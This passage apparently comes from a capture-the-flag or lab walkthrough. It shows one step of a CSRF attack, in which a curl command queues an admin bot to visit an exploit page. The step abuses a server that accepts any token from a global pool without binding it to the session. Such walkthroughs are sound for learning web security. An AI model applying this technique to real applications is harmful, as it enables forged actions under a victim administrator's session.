Tell the admin bot to visit your exploit page. The bot will fetch it, parse the form, and submit it using the admin session cookie — but with YOUR CSRF token.
Command / Input
curl -s -X POST http://localhost:$PORT/api/queue-visit -d 'url=http://localhost:8888/exploit.html'
Output
{"ok":true,"message":"Admin bot will visit shortly (every 5 s)"}
⚑ The server accepts the request because it only checks that the token exists in the global pool — it never verifies the token belongs to the admin session.